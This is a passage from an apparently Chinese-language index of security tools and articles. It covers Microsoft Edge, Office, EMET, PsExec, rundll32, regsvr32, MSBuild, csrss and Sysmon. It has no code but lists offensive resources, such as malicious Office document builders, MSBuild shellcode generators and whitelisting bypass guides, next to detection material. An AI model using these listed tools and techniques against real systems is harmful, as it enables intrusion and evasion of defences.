id="29ae3a9557d3c14f79aad2303e6bb828"></a>Open Office XML ### <a id="177dd1d296e82b2dfad2cdcb2a37be2d"></a>工具 *** ## <a id="1c2073da678b183d1872ee62c568e7f5"></a>其他 # <a id="928770b6fa4ff230a685448ae6573e52"></a>各类软件 *** ## <a id="9bb54db4c51a3d146863d4ce1d36c498"></a>MS Internet Explorer ### <a id="d1119ba6c8e896a186d925ccac371d59"></a>工具 *** ## <a id="9003b6891f28795af6a0f11622ed813b"></a>MS Edge ### <a id="ea3a3225108e179d9afe0b6e017dde52"></a>工具 - [**8097**星][2m] [JS] [microsoft/chakracore](https://github.com/microsoft/chakracore) ChakraCore is the core part of the Chakra JavaScript engine that powers Microsoft Edge - [**2356**星][1y] [microsoftedge/msedge](https://github.com/microsoftedge/msedge) Microsoft Edge - [**217**星][4m] [Go] [improbable-eng/kedge](https://github.com/improbable-eng/kedge) kEdge - Kubernetes Edge Proxy for gRPC and HTTP Microservices ### <a id="0019e616c7579c7151faf531b4a0c771"></a>文章 - 2020.02 [4sysops] [Deploy and manage Microsoft Edge using WSUS and GPOs](https://4sysops.com/archives/deploy-and-manage-microsoft-edge-using-wsus-and-gpos/) - 2019.09 [4hou] [Microsoft Edge浏览器的Universal XSS漏洞分析(CVE-2019-1030)](https://www.4hou.com/info/news/20307.html) - 2019.09 [aliyun] [Microsoft Edge - Universal XSS](https://xz.aliyun.com/t/6279) - 2019.08 [microsoft] [Announcing the Microsoft Edge Insider Bounty](https://msrc-blog.microsoft.com/2019/08/20/announcing-the-microsoft-edge-insider-channels-bounty/) - 2019.07 [4sysops] [Hands-on review of Microsoft Edge (Chromium) business features: GPO support, IE mode, offline installer](https://4sysops.com/archives/hands-on-review-of-microsoft-edge-chromium-business-features-gpo-support-ie-mode-offline-installer/) - 2019.06 [payatu] [Microsoft Edge Extensions Host Permission Bypass (CVE-2019-0678)](https://payatu.com/microsoft-edge-extensions-host-permission-bypass-cve-2019-0678/) - 2019.06 [payatu] [microsoft edge extensions host-permission bypass (cve-2019-0678)](https://payatu.com/blog/Nikhil-Mittal/microsoft-edge-extensions-host-permission-bypass-cve-2019-0678) - 2019.05 [exodusintel] [Pwn2Own 2019: Microsoft Edge Sandbox Escape (CVE-2019-0938). Part 2](https://blog.exodusintel.com/2019/05/27/pwn2own-2019-microsoft-edge-sandbox-escape-cve-2019-0938-part-2/) - 2019.05 [exodusintel] [Pwn2Own 2019: Microsoft Edge Renderer Exploitation (CVE-2019-0940). Part 1](https://blog.exodusintel.com/2019/05/19/pwn2own-2019-microsoft-edge-renderer-exploitation-cve-2019-9999-part-1/) - 2019.05 [freebuf] [Microsoft Edge和IE浏览器同源策略绕过漏洞分析](https://www.freebuf.com/vuls/200131.html) - 2019.04 [] [Microsoft Edge Uses a Secret Trick And Breaks Internet Explorer's Security](https://blog.0patch.com/2019/04/microsoft-edge-uses-secret-trick-and.html) - 2019.04 [topsec] [天融信关于Microsoft Edge和IE浏览器同源策略绕过漏洞分析](http://blog.topsec.com.cn/%e5%a4%a9%e8%9e%8d%e4%bf%a1%e5%85%b3%e4%ba%8emicrosoft-edge%e5%92%8cie%e6%b5%8f%e8%a7%88%e5%99%a8%e5%90%8c%e6%ba%90%e7%ad%96%e7%95%a5%e7%bb%95%e8%bf%87%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/) - 2019.04 [venus] [关于 Microsoft Edge 和 IE 浏览器同源策略绕过漏洞分析](https://paper.seebug.org/883/) - 2019.04 [trendmicro] [Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data](https://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-edge-and-internet-explorer-zero-days-allow-access-to-confidential-session-data/) - 2019.03 [aliyun] [深入分析Microsoft Edge Chakra JIT类型混淆漏洞的利用方式](https://xz.aliyun.com/t/4475) - 2019.03 [360] [Microsoft Edge CVE-2019-0539 漏洞分析与利用](https://www.anquanke.com/post/id/173475/) - 2019.02 [4hou] [Microsoft Edge Chakra JIT类型混淆漏洞分析(CVE-2019-0539)](http://www.4hou.com/vulnerable/16211.html) - 2019.02 [trendmicro] [Announcing Trend Micro Security for Microsoft Edge](https://blog.trendmicro.com/announcing-trend-micro-security-for-microsoft-edge/) - 2018.12 [4hou] [在Microsoft Edge中实现DOM树](http://www.4hou.com/web/15072.html) - 2018.10 [fortinet] [An Analysis of Microsoft Edge Chakra JavascriptArray TypeId Handling Memory Corruption (CVE-2018-8467)](https://www.fortinet.com/blog/threat-research/an-analysis-of-microsoft-edge-chakra-javascriptarray-typeid-hand.html) *** ## <a id="63479a46662292ab817171322fecfcf4"></a>MS Office ### <a id="40ce3b16876770b8c0bf0e67c0abf1e8"></a>工具 - [**1731**星][1m] [JS] [ziv-barber/officegen](https://github.com/ziv-barber/officegen) Standalone Office Open XML files (Microsoft Office 2007 and later) generator for Word (docx), PowerPoint (pptx) and Excell (xlsx) in javascript. The output is a stream. - [**1066**星][20d] [Rich Text Format] [decalage2/oletools](https://github.com/decalage2/oletools) python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging. - [**750**星][9d] [C#] [outflanknl/evilclippy](https://github.com/outflanknl/evilclippy) A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows. - [**407**星][2m] [YARA] [guelfoweb/peframe](https://github.com/guelfoweb/peframe) PEframe is a open source tool to perform static analysis on Portable Executable malware and malicious MS Office documents. ### <a id="0e7bba8c1c7a86374dad4962cb4bfd9f"></a>文章 - 2020.02 [talosintelligence] [Microsoft Office Excel Ordinal43 code execution vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2019-0968) - 2019.11 [talosintelligence] [Microsoft Office Excel WorksheetOptions Code Execution Vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2019-0886) - 2019.10 [Kaspersky] [Exploit Prevention: Microsoft Office Memory Corruption](https://www.youtube.com/watch?v=7J6tLrkK81Y) - 2019.09 [zerodayinitiative] [CVE-2019-0801: Microsoft Office Uri Hyperlink Hijinks](https://www.zerodayinitiative.com/blog/2019/9/24/cve-2019-0801-microsoft-office-uri-hyperlink-hijinks) - 2019.08 [freebuf] [CVE-2018-0798:Microsoft office 公式编辑器 Matrix record 栈溢出漏洞分析](https://www.freebuf.com/vuls/210945.html) - 2019.08 [trendmicro] [Asruex Backdoor Variant Infects Word Documents and PDFs Through Old MS Office and Adobe Vulnerabilities](https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/) - 2019.06 [NullByte] [Crack Password-Protected Microsoft Office Files [Tutorial]](https://www.youtube.com/watch?v=m0E8PlTIx-c) - 2019.05 [nviso] [Detecting and Analyzing Microsoft Office Online Video](https://blog.nviso.be/2019/05/29/detecting-and-analyzing-microsoft-office-online-video/) - 2019.05 [mdsec] [Persistence: “the continued or prolonged existence of something”: Part 1 – Microsoft Office](https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-1-microsoft-office/) - 2019.05 [freebuf] [揭秘如何使用跨平台的EvilClippy创建恶意MS Office文档](https://www.freebuf.com/articles/terminal/202408.html) - 2019.04 [kaspersky] [Microsoft Office and its vulnerabilities](https://www.kaspersky.com/blog/ms-office-vulnerabilities-sas-2019/26415/) - 2019.04 [TROOPERScon] [TR19: MS Office file format sorcery](https://www.youtube.com/watch?v=iXvvQ5XML7g) - 2019.02 [myonlinesecurity] [Formbook via fake invoice using Microsoft Office Equation Editor exploits](https://myonlinesecurity.co.uk/formbook-via-fake-invoice-using-microsoft-office-equation-editor-exploits/) - 2019.01 [myonlinesecurity] [Azorult via fake inquiry email using Microsoft Office Equation Editor exploits](https://myonlinesecurity.co.uk/azorult-via-fake-inquiry-email-using-microsoft-office-equation-editor-exploits/) - 2019.01 [fuzzysecurity] [Microsoft Office 2003 Home/Pro 0day](http://fuzzysecurity.com/exploits/3.html) - 2018.12 [proofpoint] [LCG工具包: 复杂的恶意Microsoft Office文档构建器](https://www.proofpoint.com/us/threat-insight/post/lcg-kit-sophisticated-builder-malicious-microsoft-office-documents) - 2018.10 [checkpoint] [Microsoft Office Vulnerability Found, Check Point Research To The Rescue | Check Point Software Blog](https://blog.checkpoint.com/2018/10/30/microsoft-office-vulnerability-found-check-point-research-to-the-rescue/) - 2018.10 [4hou] [通过Microsoft Office和YouTube视频传递恶意软件的PoC攻击](http://www.4hou.com/info/news/14256.html) - 2018.10 [stationx] [Malware payloads latest: Microsoft Office macros remain the most frequently used delivery method](https://www.stationx.net/malware-payloads-latest-microsoft-office-macros-remain-the-most-frequently-used-delivery-method/) - 2018.09 [sans] [Dissecting Malicious MS Office Docs](https://isc.sans.edu/forums/diary/Dissecting+Malicious+MS+Office+Docs/24108/) *** ## <a id="979c4f76c79c7e7a453727c7d6ecd539"></a>EMET ### <a id="9d5a8c1da43df3879057ee7f1cd48c4e"></a>工具 ### <a id="c968b8e10a7f96dfdbea90a85e86c02c"></a>文章 - 2019.10 [HackersOnBoard] [Black Hat USA 2016 Using EMET to Disable EMET](https://www.youtube.com/watch?v=2Q6umFQuaik) - 2018.08 [cmu] [Life Beyond Microsoft EMET](https://insights.sei.cmu.edu/cert/2018/08/life-beyond-microsoft-emet.html) - 2018.03 [4hou] [Windows 10 RS3中的EMET ASR功能优劣分析](http://www.4hou.com/system/10347.html) - 2018.01 [mattifestation] [The EMET Attack Surface Reduction Replacement in Windows 10 RS3: The Good, the Bad, and the Ugly](https://posts.specterops.io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df) - 2018.01 [mattifestation] [The EMET Attack Surface Reduction Replacement in Windows 10 RS3: The Good, the Bad, and the Ugly](https://medium.com/p/34d5a253f3df) - 2017.08 [rootedconmadrid] [PABLO SAN EMETERIO - Inteligencia privada, más allá de STIX [Rooted CON 2017 - ENG]](https://www.youtube.com/watch?v=M65axe7VZ8o) - 2017.08 [rootedconmadrid] [PABLO SAN EMETERIO - Inteligencia privada, más allá de STIX [Rooted CON 2017 - ESP]](https://www.youtube.com/watch?v=u-scok-1xqk) - 2017.04 [ropchain] [一个写操作,解除EMET 5.52的武装!](https://blog.ropchain.com/2017/04/03/disarming-emet-5-52/) - 2017.03 [grandstreamdreams] [Enhanced Mitigation Experience Toolkit (EMET) 5.5/5.52 Uninstall Error 2738](http://grandstreamdreams.blogspot.com/2017/03/enhanced-mitigation-experience-toolkit.html) - 2017.03 [pediy] [[翻译]野外的 CVE-2015-2545 逃逸了 EMET](https://bbs.pediy.com/thread-216046.htm) - 2017.03 [pediy] [[翻译]EPS文件利用如何逃逸 EMET(CVE-2015-2545) —— 一次技术探索](https://bbs.pediy.com/thread-216045.htm) - 2017.01 [microsoft] [EMET 5.52 update is now available](https://msrc-blog.microsoft.com/2017/01/12/emet-5-52-update-is-now-available/) - 2016.11 [sophos] [Moving beyond EMET, Part 2](https://news.sophos.com/en-us/2016/11/30/moving-beyond-emet-part-2/) - 2016.11 [dist67] [EMET vs Hancitor Maldoc](https://www.youtube.com/watch?v=hyQ7UN5VSuQ) - 2016.11 [dist67] [VBA Shellcode To Test EMET](https://www.youtube.com/watch?v=ACmcFanE658) - 2016.11 [cmu] [Windows 10 Cannot Protect Insecure Applications Like EMET Can](https://insights.sei.cmu.edu/cert/2016/11/windows-10-cannot-protect-insecure-applications-like-emet-can.html) - 2016.11 [morphisec] [EMET Refuses to Die](http://blog.morphisec.com/emet-refuses-to-die) - 2016.11 [sans] [VBA Shellcode and EMET](https://isc.sans.edu/forums/diary/VBA+Shellcode+and+EMET/21705/) - 2016.11 [microsoft] [Bringing EMET protections into Windows 10](https://cloudblogs.microsoft.com/microsoftsecure/2016/11/03/bringing-emet-protections-into-windows-10/) - 2016.11 [microsoft] [Moving Beyond EMET](https://msrc-blog.microsoft.com/2016/11/03/beyond-emet/) *** ## <a id="98f74e5f893a0c326ef336619bc515c4"></a>psexec ### <a id="336e94749dba45c45e97e436673d38a0"></a>工具 - [**264**星][14d] [C++] [poweradminllc/paexec](https://github.com/poweradminllc/paexec) Remote execution, like PsExec ### <a id="0d2c5f807488fe1e68d9a968d04d2b56"></a>文章 - 2019.10 [freebuf] [GlobeImposter2.0再出新变种,疑似利用PsExec内网传播](https://www.freebuf.com/articles/system/214849.html) - 2019.09 [4hou] [GlobeImposter2.0再出新变种,疑似利用PsExec内网传播](https://www.4hou.com/system/20431.html) - 2019.04 [trendmicro] [Account With Admin Privileges Abused to Install BitPaymer Ransomware via PsExec](https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec/) - 2018.11 [redcanary] [Threat Hunting for PsExec, Open-Source Clones, and Other Lateral Movement Tools](https://www.redcanary.com/blog/threat-hunting-psexec-lateral-movement/) - 2018.11 [countercept] [Endpoint Detection of Remote Service Creation and PsExec](https://countercept.com/blog/endpoint-detection-of-remote-service-creation-and-psexec/) - 2018.11 [countercept] [Endpoint Detection of Remote Service Creation and PsExec](https://countercept.com/our-thinking/endpoint-detection-of-remote-service-creation-and-psexec/) - 2018.11 [cybertriage] [使用PsExec登陆远程系统可能导致密码泄漏](https://www.cybertriage.com/2018/robust-use-of-psexec-that-doesnt-reveal-password-hashes/) - 2018.09 [contextis] [Lateral movement: A deep look into PsExec](https://www.contextis.com/blog/lateral-movement-a-deep-look-into-psexec) - 2018.09 [contextis] [Lateral movement: A deep look into PsExec](https://www.contextis.com/en/blog/lateral-movement-a-deep-look-into-psexec) - 2018.04 [hexacorn] [A quick note about PSExecutionPolicyPreference](http://www.hexacorn.com/blog/2018/04/06/a-quick-note-about-psexecutionpolicypreference/) - 2018.01 [venus] [老牌工具 PsExec 一个琐碎的细节](https://paper.seebug.org/503/) - 2017.12 [hexacorn] [PsExec going places…](http://www.hexacorn.com/blog/2017/12/25/psexec-going-places/) - 2017.12 [pediy] [[原创]PsExec 在当前会话下启动系统权限进程原理](https://bbs.pediy.com/thread-223197.htm) - 2017.06 [guyrleech] [Petya:禁止 psexec 远程执行](https://guyrleech.wordpress.com/2017/06/28/petya-disabling-remote-execution-of-psexec/) - 2017.06 [guyrleech] [Petya: easily disabling access to psexec](https://guyrleech.wordpress.com/2017/06/28/petya-easily-disabling-access-to-psexec/) - 2017.06 [rastamouse] [PsExec Much?](https://rastamouse.me/2017/06/psexec-much/) - 2017.05 [govolution] [Write your own metasploit psexec service](https://govolution.wordpress.com/2017/05/27/write-your-own-metasploit-psexec-service/) - 2017.05 [moxia] [【技术分享】丢掉PSEXEC来横向渗透](http://www.moxia.org/Blog.php/index.php/archives/184) - 2017.03 [rapid7] [Combining Responder and PsExec for Internal Penetration Tests](https://blog.rapid7.com/2017/03/21/combining-responder-and-psexec-for-internal-penetration-tests/) - 2017.03 [mindpointgroup] [Lateral Movement with PSExec](https://www.mindpointgroup.com/blog/lateral-movement-with-psexec/) *** ## <a id="4a17ea9f0555ae7c61b9762fd789b23c"></a>Nltest *** ## <a id="5c1479af60b597303b2a885e92c1e384"></a>CMSTP.exe *** ## <a id="cc6df9989a20eb5dd533f032daeca9b3"></a>Rundll32 ### <a id="1e1be483a674d3e6330b31f0f11dadb5"></a>工具 ### <a id="68b21ccc26f1f7877ae8e70a907e67ce"></a>文章 - 2020.01 [reegun] [Curl.exe is the new rundll32.exe — LOLbin](https://medium.com/p/3f79c5f35983) - 2019.09 [hexacorn] [RunDll32 — API calling](http://www.hexacorn.com/blog/2019/09/28/rundll32-api-calling/) - 2019.01 [hackingarticles] [Bypass Application Whitelisting using rundll32.exe (Multiple Methods)](https://www.hackingarticles.in/bypass-application-whitelisting-using-rundll32-exe-multiple-methods/) - 2018.11 [hexacorn] [advpack.dll ! DelNodeRunDLL32 and its flags](http://www.hexacorn.com/blog/2018/11/24/advpack-dll-delnoderundll32-and-its-flags/) - 2018.11 [aliyun] [如何利用RunDLL32调用.NET Assembly](https://xz.aliyun.com/t/3172) - 2018.11 [xpnsec] [使.NET程序集导出静态函数, 并使用RunDLL32加载](https://blog.xpnsec.com/rundll32-your-dotnet/) - 2018.03 [3gstudent] [关于利用rundll32执行程序的分析](https://3gstudent.github.io/3gstudent.github.io/%E5%85%B3%E4%BA%8E%E5%88%A9%E7%94%A8rundll32%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%88%86%E6%9E%90/) - 2018.03 [3gstudent] [关于利用rundll32执行程序的分析](https://3gstudent.github.io/3gstudent.github.io/%E5%85%B3%E4%BA%8E%E5%88%A9%E7%94%A8rundll32%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%88%86%E6%9E%90/) - 2018.03 [aliyun] [关于利用rundll32执行程序的分析](https://xz.aliyun.com/t/2188) - 2018.01 [freebuf] [命令行下的“蒙面歌王”rundll32.exe](http://www.freebuf.com/sectool/160696.html) - 2016.07 [cobaltstrike] [Why is rundll32.exe connecting to the internet?](https://blog.cobaltstrike.com/2016/07/22/why-is-rundll32-exe-connecting-to-the-internet/) - 2014.02 [attackdebris] [rundll32 lockdown testing goodness](https://www.attackdebris.com/?p=143) *** ## <a id="3ebe3d66a05d92aed5459ed72f1e3678"></a>Regsvr32 ### <a id="c739394b21b3aad9293b747d7d141956"></a>工具 ### <a id="fdd93367db93bf20c10b5dbb6f6e1b0f"></a>文章 - 2017.11 [conscioushacker] [Application Whitelisting Bypass: regsvr32.exe](https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-regsvr32-exe/) - 2017.05 [blackhillsinfosec] [How to Evade Application Whitelisting Using REGSVR32](https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/) - 2016.07 [hackingarticles] [Hack Remote Windows PC using Regsvr32.exe (.sct) Application Whitelisting Bypass Server](http://www.hackingarticles.in/hack-remote-windows-pc-using-regsvr32-exe-sct-application-whitelisting-bypass-server/) - 2013.09 [dustri] [regsvr32 returns 0x80070005](https://dustri.org/b/regsvr32-returns-0x80070005.html) *** ## <a id="70d731a999b1cd69d565e35c98540ec9"></a>Regasm *** ## <a id="b2008a3c57c0e58f8ea1d03f583eb1c1"></a>Regsvcs *** ## <a id="c8596ed2e3d35337492ccffcd5a87027"></a>svchost ### <a id="1928a187378080b11b7119305b61aad5"></a>工具 ### <a id="45a0356bc132fc320e96e8bbb5b340f9"></a>文章 - 2017.12 [hexacorn] [svchost.exe -> explorer.exe on win10](http://www.hexacorn.com/blog/2017/12/07/svchost-exe-explorer-exe-on-win10/) - 2015.12 [hexacorn] [The typographical and homomorphic abuse of svchost.exe, and other popular file names](http://www.hexacorn.com/blog/2015/12/18/the-typographical-and-homomorphic-abuse-of-svchost-exe-and-other-popular-file-names/) - 2013.12 [myonlinesecurity] [XP SP3 Svchost causes high (100%) CPU usage when updating](https://myonlinesecurity.co.uk/xp-sp3-svchost-causes-high-100-cpu-usage-when-updating/) - 2013.11 [myonlinesecurity] [Windows XP update locks machines with SVCHOST redlined at 100%: Fix it with KB 2879017 | Microsoft windows – InfoWorld](https://myonlinesecurity.co.uk/windows-xp-update-locks-machines-with-svchost-redlined-at-100-fix-it-with-kb-2879017-microsoft-windows-infoworld/) - 2013.07 [hexacorn] [The typographical and homomorphic abuse of svchost.exe](http://www.hexacorn.com/blog/2013/07/04/the-typographical-and-homomorphic-abuse-of-svchost-exe/) - 2011.01 [pediy] [[原创]svchost进程的浅析](https://bbs.pediy.com/thread-127798.htm) *** ## <a id="666aceb7939a7ba06d77a71a2baffeee"></a>MSBuild ### <a id="0f3c4b5cdc69b98c87e175ef7bb76396"></a>工具 - [**4136**星][7d] [C#] [microsoft/msbuild](https://github.com/microsoft/msbuild) The Microsoft Build Engine (MSBuild) is the build platform for .NET and Visual Studio. - [**728**星][9m] [Py] [mr-un1k0d3r/powerlessshell](https://github.com/mr-un1k0d3r/powerlessshell) 依靠MSBuild.exe远程执行PowerShell脚本和命令 - [**226**星][7m] [Py] [infosecn1nja/maliciousmacromsbuild](https://github.com/infosecn1nja/maliciousmacromsbuild) Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass. ### <a id="1e5138d2ba592b1886ed23b8d22d2e07"></a>文章 - 2019.06 [rastamouse] [TikiSpawn & MSBuild](https://rastamouse.me/2019/06/tikispawn-msbuild/) - 2019.01 [hackingarticles] [Bypass Application Whitelisting using msbuild.exe (Multiple Methods)](https://www.hackingarticles.in/bypass-application-whitelisting-using-msbuild-exe-multiple-methods/) - 2017.11 [freebuf] [海莲花团伙利用MSBuild机制免杀样本分析](http://www.freebuf.com/articles/system/154947.html) - 2017.11 [360] [海莲花团伙利用MSBuild机制免杀样本分析](https://www.anquanke.com/post/id/87299/) - 2017.11 [venus] [海莲花团伙利用MSBuild机制免杀样本分析](https://paper.seebug.org/462/) - 2017.11 [conscioushacker] [Application Whitelisting Bypass: msbuild.exe](https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/) - 2017.01 [codepool] [Using MSBuild for DLL configuration files, transformations and output to referencing projects.](http://codepool.me/msbuild-config-files-for-dlls/) - 2016.10 [] [Use MSBuild To Do More(渗透中MSBuild的应用技巧)](http://www.91ri.org/16436.html) - 2016.09 [360] [Use MSBuild To Do More(渗透中MSBuild的应用技巧)](https://www.anquanke.com/post/id/84597/) - 2016.09 [3gstudent] [Use MSBuild To Do More](https://3gstudent.github.io/3gstudent.github.io/Use-MSBuild-To-Do-More/) - 2016.09 [sysprogs] [10 Reasons to Try Out MSBuild for your VisualGDB Projects](https://sysprogs.com/w/10-reasons-to-try-out-msbuild-for-your-visualgdb-projects/) - 2013.09 [redplait] [msbuild 4.0 debugger](http://redplait.blogspot.com/2013/09/msbuild-40-debugger.html) - 2013.09 [redplait] [clang and msbuild integration](http://redplait.blogspot.com/2013/09/clang-and-msbuild-integration.html) - 2013.01 [lowleveldesign] [MSBuild: MSB3275 warning, GAC and .NET version](https://lowleveldesign.org/2013/01/05/msb3275-gac-net-version/) *** ## <a id="6f70488efd1c03c94c309fb6e1e7f28a"></a>csrss.exe ### <a id="9abd04f5352aa1714ccef5012cc33c6c"></a>文章 - 2018.03 [pediy] [[原创]驱动注入用户线程之跨session通知csrss之真正解决](https://bbs.pediy.com/thread-225047.htm) - 2015.08 [pediy] [[原创]纯C++编写Win32/X64通用Shellcode注入csrss进程.](https://bbs.pediy.com/thread-203140.htm) - 2012.05 [pediy] [[原创]Csrss进程剖析](https://bbs.pediy.com/thread-150284.htm) - 2011.08 [vexillium] [0-day Windows XP SP3 Denial of Service (CSRSS Crash #1)](http://j00ru.vexillium.org/?p=971) - 2011.08 [vexillium] [0-day Windows XP SP3 Denial of Service (CSRSS Crash)](https://j00ru.vexillium.org/2011/08/0-day-windows-xp-sp3-denial-of-service-csrss-crash/) - 2011.07 [vexillium] [CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability](http://j00ru.vexillium.org/?p=893) - 2011.07 [vexillium] [CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability](https://j00ru.vexillium.org/2011/07/cve-2011-1281-a-story-of-a-windows-csrss-privilege-escalation-vulnerability/) - 2010.07 [vexillium] [Windows CSRSS Write Up: Inter-process Communication (part 2/3)](http://j00ru.vexillium.org/?p=527) - 2010.07 [vexillium] [Windows CSRSS Write Up: Inter-process Communication (part 2/3)](https://j00ru.vexillium.org/2010/07/windows-csrss-write-up-inter-process-communication-part-2/) - 2010.07 [vexillium] [Windows CSRSS Write Up: Inter-process Communication (part 1/3)](http://j00ru.vexillium.org/?p=502) - 2010.07 [vexillium] [Windows CSRSS Write Up: Inter-process Communication (part 1/3)](https://j00ru.vexillium.org/2010/07/windows-csrss-write-up-inter-process-communication-part-1/) - 2010.07 [vexillium] [Windows CSRSS Write Up: the basics (part 1/1)](http://j00ru.vexillium.org/?p=492) - 2010.07 [vexillium] [Windows CSRSS write up: the basics](https://j00ru.vexillium.org/2010/07/windows-csrss-write-up-the-basics/) - 2010.05 [pediy] [[原创]详解进程创建中与csrss的通信流程](https://bbs.pediy.com/thread-113079.htm) - 2010.05 [coldwind] [Windows CSRSS cross-version API Table](http://gynvael.coldwind.pl/?id=311) - 2010.05 [vexillium] [Windows CSRSS cross-version API Table](http://j00ru.vexillium.org/?p=349) - 2010.05 [vexillium] [Windows CSRSS cross-version API Table](https://j00ru.vexillium.org/2010/05/windows-csrss-cross-version-api-table/) - 2010.02 [coldwind] [Microsoft Windows CSRSS Local Privilege Elevation Vulnerability](http://gynvael.coldwind.pl/?id=284) - 2009.05 [pediy] [[原创]CsrssWalker学习笔记(附源代码)](https://bbs.pediy.com/thread-89708.htm) - 2009.03 [pediy] [[原创]CsrssVuln.exe源代码及分析](https://bbs.pediy.com/thread-85015.htm) *** ## <a id="65a0235ddaea9da80145fa441eb0af2a"></a>其他exe ### <a id="eceb5b79694c803399b0de795fffc296"></a>文章 - 2019.05 [hexacorn] [msiexec.exe as a LOLBIN](http://www.hexacorn.com/blog/2019/05/29/msiexec-exe-as-a-lolbin/) - 2019.04 [talosintelligence] [Shimo VPN helper tool RunVpncScript privilege escalation vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2018-0677) - 2019.01 [hackingarticles] [Bypass Application Whitelisting using msiexec.exe (Multiple Methods)](https://www.hackingarticles.in/bypass-application-whitelisting-using-msiexec-exe-multiple-methods/) - 2018.09 [redcanary] [Detecting MSXSL Abuse in the Wild](https://www.redcanary.com/blog/detecting-msxsl-attacks/) - 2018.07 [4hou] [mavinject.exe的新用法](http://www.4hou.com/technology/12276.html) - 2018.05 [mattifestation] [mavinject.exe Functionality Deconstructed](https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e) - 2018.05 [mattifestation] [mavinject.exe Functionality Deconstructed](https://medium.com/p/c29ab2cf5c0e) - 2018.04 [hexacorn] [Curious case of the conhost.exe and condrv.sys](http://www.hexacorn.com/blog/2018/04/01/curious-case-of-the-conhost-exe-and-condrv-sys/) - 2018.03 [reaqta] [Spear-phishing campaign leveraging on MSXSL](https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/) - 2018.02 [4hou] [LokiBot变种正在使用msiexec.exe安装后门](http://www.4hou.com/info/10373.html) - 2018.02 [360] [借助Windows Installer的msiexec.exe实现LokiBot恶意软件感染](https://www.anquanke.com/post/id/98190/) - 2018.02 [trendmicro] [Attack Using Windows Installer msiexec.exe leads to LokiBot](https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/) - 2017.12 [reaqta] [From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector](https://reaqta.com/2017/12/mavinject-microsoft-injector/) - 2017.01 [4hou] [渗透测试中的msiexec](http://www.4hou.com/technology/2742.html) - 2016.12 [3gstudent] [渗透测试中的msiexec](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84msiexec/) - 2016.12 [3gstudent] [渗透测试中的msiexec](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84msiexec/) - 2016.12 [4hou] [PowerShell技巧——借助kd.exe隐藏进程](http://www.4hou.com/info/news/1979.html) - 2016.12 [nettitude] [Fun with Windows binaries – application whitelist bypass using msiexec](https://labs.nettitude.com/blog/fun-with-windows-binaries-application-whitelist-bypass-using-msiexec/) - 2016.12 [3gstudent] [Powershell tricks::Hide Process by kd.exe](https://3gstudent.github.io/3gstudent.github.io/Powershell-tricks-Hide-Process-by-kd.exe/) - 2016.11 [3gstudent] [Study Notes of using dnx.exe / rcsi.exe to bypass Decvice Guard UMCI](https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-dnx.exe-&-rcsi.exe-to-bypass-Decvice-Guard-UMCI/) # <a id="d7a63740447f820c26b938b5bc391ef3"></a>SysInternalSuite *** ## <a id="0fed6a96b28f339611e7b111b8f42c23"></a>Sysmon ### <a id="d48f038b58dc921660be221b4e302f70"></a>工具 - [**2177**星][1m] [swiftonsecurity/sysmon-config](https://github.com/swiftonsecurity/sysmon-config) Sysmon configuration file template with default high-quality event tracing - [**715**星][23d] [PS] [olafhartong/sysmon-modular](https://github.com/olafhartong/sysmon-modular) sysmon配置模块收集 - [**667**星][2m] [nshalabi/sysmontools](https://github.com/nshalabi/sysmontools) Utilities for Sysmon - [**546**星][12d] [mhaggis/sysmon-dfir](https://github.com/mhaggis/sysmon-dfir) Sources, configuration and how to detect evil things utilizing Microsoft Sysmon. - [**455**星][1y] [Batchfile] [ion-storm/sysmon-config](https://github.com/ion-storm/sysmon-config) Advanced Sysmon configuration, Installer & Auto Updater with high-quality event tracing - [**246**星][13d] [CSS] [trustedsec/sysmoncommunityguide](https://github.com/trustedsec/sysmoncommunityguide) TrustedSec Sysinternals Sysmon Community Guide ### <a id="2c8cb7fdf765b9d930569f7c64042d62"></a>文章 - 2020.01 [bugbountywriteup] [Unloading the Sysmon Minifilter Driver](https://medium.com/p/86f4541fa55a) - 2019.12 [] [How to Test Bro-Sysmon](https://engineering.salesforce.com/test-out-bro-sysmon-a6fad1c8bb88) - 2019.12 [vanimpe] [Use Sysmon DNS data for incident response](https://www.vanimpe.eu/2019/12/02/use-sysmon-dns-data-for-incident-response/) - 2019.11 [4hou] [你不知道的威胁狩猎技巧:Windows API 与 Sysmon 事件的映射](https://www.4hou.com/system/21461.html) - 2019.10 [HackersOnBoard] [Subverting Sysmon Application of a Formalized Security Product Evasion 